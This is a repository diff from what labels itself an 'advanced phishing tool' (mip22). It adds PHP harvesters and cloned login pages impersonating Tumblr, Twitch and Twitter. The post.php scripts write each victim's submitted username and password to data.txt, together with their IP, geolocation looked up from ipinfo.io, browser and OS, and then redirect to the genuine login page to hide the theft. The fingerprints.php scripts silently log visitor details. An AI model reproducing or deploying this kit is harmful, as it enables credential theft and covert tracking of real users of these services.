+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/tumblr/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTUMBLR VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['email'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['password'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.tumblr.com/login"/> 

+ 126 - 0
.pages/twitch/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTWITCH VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

Файлын зөрүү хэтэрхий том тул дарагдсан байна
+ 1 - 0
.pages/twitch/index.html


+ 25 - 0
.pages/twitch/index.php

@@ -0,0 +1,25 @@
+<?php
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 130 - 0
.pages/twitch/post.php

@@ -0,0 +1,130 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "data.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTWITCH VICTIM DATA => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, "Username: " . $_POST['Username'] . "\n", FILE_APPEND);
+file_put_contents($file, "Password: " . $_POST['Password'] . "\n", FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>
+
+ <meta http-equiv="refresh" content="0; url=https://www.twitch.tv/login"/> 

+ 126 - 0
.pages/twitter/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nTWITER VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

+ 480 - 0
.pages/twitter/index.html

@@ -0,0 +1,480 @@
+<!DOCTYPE html><html dir="ltr" style="font-size: 15px;" lang="en"><head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0,viewport-fit=cover">
+<link rel="preconnect" href="//abs.twimg.com">
+<link rel="preconnect" href="//api.twitter.com">
+<link rel="preconnect" href="//pbs.twimg.com">
+<link rel="preconnect" href="//t.co">
+<link rel="preconnect" href="//video.twimg.com">
+<link rel="dns-prefetch" href="//abs.twimg.com">
+<link rel="dns-prefetch" href="//api.twitter.com">
+<link rel="dns-prefetch" href="//pbs.twimg.com">
+<link rel="dns-prefetch" href="//t.co">
+<link rel="dns-prefetch" href="//video.twimg.com">
+
+
+
+<meta property="og:site_name" content="Twitter">
+
+
+<link rel="alternate" hreflang="x-default" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=en">
+<link rel="alternate" hreflang="ar" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ar">
+<link rel="alternate" hreflang="bg" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=bg">
+<link rel="alternate" hreflang="bn" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=bn">
+<link rel="alternate" hreflang="ca" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ca">
+<link rel="alternate" hreflang="cs" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=cs">
+<link rel="alternate" hreflang="da" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=da">
+<link rel="alternate" hreflang="de" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=de">
+<link rel="alternate" hreflang="el" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=el">
+<link rel="alternate" hreflang="en" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=en">
+<link rel="alternate" hreflang="en-GB" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=en-GB">
+<link rel="alternate" hreflang="es" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=es">
+<link rel="alternate" hreflang="eu" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=eu">
+<link rel="alternate" hreflang="fa" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=fa">
+<link rel="alternate" hreflang="fi" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=fi">
+<link rel="alternate" hreflang="tl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=tl">
+<link rel="alternate" hreflang="fr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=fr">
+<link rel="alternate" hreflang="ga" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ga">
+<link rel="alternate" hreflang="gl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=gl">
+<link rel="alternate" hreflang="gu" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=gu">
+<link rel="alternate" hreflang="he" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=he">
+<link rel="alternate" hreflang="hi" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=hi">
+<link rel="alternate" hreflang="hr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=hr">
+<link rel="alternate" hreflang="hu" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=hu">
+<link rel="alternate" hreflang="id" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=id">
+<link rel="alternate" hreflang="it" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=it">
+<link rel="alternate" hreflang="ja" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ja">
+<link rel="alternate" hreflang="kn" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=kn">
+<link rel="alternate" hreflang="ko" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ko">
+<link rel="alternate" hreflang="mr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=mr">
+<link rel="alternate" hreflang="ms" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ms">
+<link rel="alternate" hreflang="nb" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=nb">
+<link rel="alternate" hreflang="nl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=nl">
+<link rel="alternate" hreflang="pl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=pl">
+<link rel="alternate" hreflang="pt" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=pt">
+<link rel="alternate" hreflang="ro" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ro">
+<link rel="alternate" hreflang="ru" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ru">
+<link rel="alternate" hreflang="sk" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=sk">
+<link rel="alternate" hreflang="sr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=sr">
+<link rel="alternate" hreflang="sv" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=sv">
+<link rel="alternate" hreflang="ta" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ta">
+<link rel="alternate" hreflang="th" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=th">
+<link rel="alternate" hreflang="tr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=tr">
+<link rel="alternate" hreflang="uk" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=uk">
+<link rel="alternate" hreflang="ur" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ur">
+<link rel="alternate" hreflang="vi" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=vi">
+<link rel="alternate" hreflang="zh" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=zh">
+
+
+<link rel="mask-icon" sizes="any" href="https://abs.twimg.com/responsive-web/web/icon-svg.9e211f64.svg" color="#1da1f2">
+<link rel="shortcut icon" data-savepage-href="//abs.twimg.com/favicons/twitter.ico" href="data:image/vnd.microsoft.icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAA0pJREFUWAntVk1oE1EQnnlJbFK3KUq9VJPYWgQVD/5QD0qpfweL1YJQoZAULBRPggp6kB78PQn14kHx0jRB0UO9REVFb1YqVBEsbZW2SbVS0B6apEnbbMbZ6qbZdTempqCHPAjvzcw3P5mdmfcAiquYgX+cAVwu/+5AdDMQnSPCHUhQA0hf+Rxy2OjicIvzm+qnKhito0qpb2wvJhWeJgCPP7oPELeHvdJ1VSGf3eOPnSWga0S0Qo9HxEkEusDBuNjbEca8G291nlBxmgDc/ukuIvAJxI6wr+yKCsq1ewLxQ2lZfpQLo8oQ4ZXdCkfnACrGWpyDCl+oQmVn5xuVPU102e2P3qoJkFOhzVb9S7KSnL5jJs/mI+As01PJFPSlZeFSZZoAGBRXBZyq9lk5NrC+e7pJ5en30c+JWk59pZ5vRDOuhAD381c/H/FKz1SMNgCE16rg505r5TT0uLqme93d0fbq+1SeLSeU83Ke0RHYFPGVPcjQfNDUwIa7M665+dQAEEjZoMwZMcEF9RxIDAgBQ2mCcqJ0Z0b+h4MNbZ4RnyOSDbNmE2iRk5jCNgIIckFoZAs4IgfLGrlKGjkzS16iwj6pV9I4mUvCPf73JVytH9nRJj24QHrqU8NCIWrMaGqAC+Ut/3ZzAS63cx4v2K/x/IvQBOCwWzu5KmJGwEJ5PIgeG9nQBDDcXPpFoDjJ7ThvBC6EZxXWkJG+JgAFwGM4KBAOcibeGCn8FQ/hyajXPmSk+1sACogn4hYk7OdiHDFSWipPkPWSmY6mCzIghEEuxJvcEYUvxIdhX2mvmSHDDPBF9AJRnDZTyp+P40671JYLbxiAohDxSTfQIg4oNxgPzCWPHaWQBViOf2jGqVwBaEaxGbAqOFMrp+SefC8eNhoFIY5lXzpmtnMGUB2IbU3JdIqVW9m5zcxINn/hAYKiIexdaTh4srHKORMAP0b28PNgJyGt5gvHzQVYx91QpVcwpRFl/p63HSR1DLbid1OcTpAJQOG7u+KH+aI5Qwj13IsamU5vkUSIc8uGLDa8OtoivV8U5HcydFLtT7hlSDVy2nfxI2Ibg9awuVU8IeJAOMF5m2B6jFs1tM5R9rS3GRP5uSuiihn4DzPwA7z7GDH+43gqAAAAAElFTkSuQmCC" type="image/x-icon">
+<link rel="apple-touch-icon" sizes="192x192" href="https://abs.twimg.com/responsive-web/web/icon-ios.8ea219d4.png">
+<meta name="mobile-web-app-capable" content="yes">
+<meta name="apple-mobile-web-app-title" content="Twitter">
+<meta name="apple-mobile-web-app-status-bar-style" content="white">
+<meta name="theme-color" content="#FFFFFF">
+
+
+
+
+<style>html, body { height: 100%; }
+body { overflow-y: scroll; overscroll-behavior-y: none; }
+</style>
+<style id="react-native-stylesheet">[stylesheet-group="0"] { }
+html { }
+body { margin: 0px; }
+button::-moz-focus-inner, input::-moz-focus-inner { border: 0px none; padding: 0px; }
+input::-webkit-inner-spin-button, input::-webkit-outer-spin-button, input::-webkit-search-cancel-button, input::-webkit-search-decoration, input::-webkit-search-results-button, input::-webkit-search-results-decoration { display: none; }
+[stylesheet-group="0.1"] { }
+:focus:not([data-focusvisible-polyfill]) { outline: currentcolor none medium; }
+[stylesheet-group="0.5"] { }
+.css-4rbku5 { background-color: rgba(0, 0, 0, 0); color: inherit; font: inherit; list-style: outside none none; margin: 0px; text-align: inherit; text-decoration: none; }
+.css-18t94o4 { cursor: pointer; }
+[stylesheet-group="1"] { }
+.css-1dbjc4n { -moz-box-align: stretch; -moz-box-direction: normal; -moz-box-orient: vertical; align-items: stretch; border: 0px solid black; box-sizing: border-box; display: flex; flex-basis: auto; flex-direction: column; flex-shrink: 0; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; position: relative; z-index: 0; }
+.css-901oao { border: 0px solid black; box-sizing: border-box; color: rgb(0, 0, 0); display: inline; font: 14px system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, "Helvetica Neue", sans-serif; margin: 0px; padding: 0px; white-space: pre-wrap; overflow-wrap: break-word; }
+.css-16my406 { color: inherit; font: inherit; white-space: inherit; }
+.css-bfa6kz { max-width: 100%; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; }
+.css-9pa8cd { inset: 0px; height: 100%; opacity: 0; position: absolute; width: 100%; z-index: -1; }
